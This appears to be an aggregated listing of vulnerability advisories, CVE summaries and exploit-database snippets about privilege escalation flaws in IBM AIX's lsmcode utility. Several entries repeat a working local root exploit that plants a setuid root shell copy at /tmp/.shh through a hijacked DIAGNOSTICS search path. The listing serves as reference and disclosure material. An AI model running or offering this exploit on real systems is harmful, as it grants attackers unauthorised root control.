IBM AIX LSMCode本地权限提升漏洞

IBM AIX是一款商业性质的UNIX操作系统。 本地攻击者可以利用IBM AIX的lsmcode命令中的权限提升漏洞以超级用户权限执行任意指令。 IBM AIX 5.3 IBM AIX 5.2 IBM AIX 5.1 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.ers.ibm.com/...

AIX 5.1 to 5.3 lsmcode Local Root Command Execution

No description provided by source. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh...

Design/Logic Flaw

Untrusted search path vulnerability in updateflash for IBM AIX 5.1, 5.2 and 5.3 allows local users to execute arbitrary commands via unknown vectors involving lsmcode and possibly other commands...

[SA20325] AIX lsmcode Unspecified Privilege Escalation Vulnerability

TITLE: AIX lsmcode Unspecified Privilege Escalation Vulnerability SECUNIA ADVISORY ID: SA20325 VERIFY ADVISORY: http://secunia.com/advisories/20325/ CRITICAL: Less critical IMPACT: Privilege escalation WHERE: Local system OPERATING SYSTEM: AIX 5.x http://secunia.com/product/213/ DESCRIPTION: A...

AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution

No description provided by source. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution

Exploit for aix platform in category local exploits ====================================================== AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution ====================================================== mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF...

AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

[EXPL] Exploit Code Release for lsmcode Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion Latest attack techniques. You're a pen tester, but is google.com still your R&D team? Now you can get trustworthy commercial-grade exploits...

IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow

source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied...

IBM AIX 4.3.x5.1 - LSMCODE Environment Variable Local Buffer Overflow

IBM AIX 4.3.x5.1 - LSMCODE Environment Variable Local Buffer Overflow source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible...

CVE-2002-0747

CVE-2002-0747 affects AIX 4.3.3 with a buffer overflow in the lsmcode component. The underlying cause is a buffer overflow, with impact stated as complete for confidentiality, integrity, and availability. The provided documents confirm the vulnerability but do not specify affected subversions, ex...

CVE-2001-1061

Technical details about CVE-2001-1061 are not provided in the supplied documents. The available descriptions are high-level; no product/version/impact/exploit details are included here. Monitor for updates from official advisories.

CVE-2001-1061

Vulnerability in lsmcode in unknown versions of AIX, possibly related to a usage error...

CVE-2001-1061

Vulnerability in lsmcode in unknown versions of AIX, possibly related to a usage error...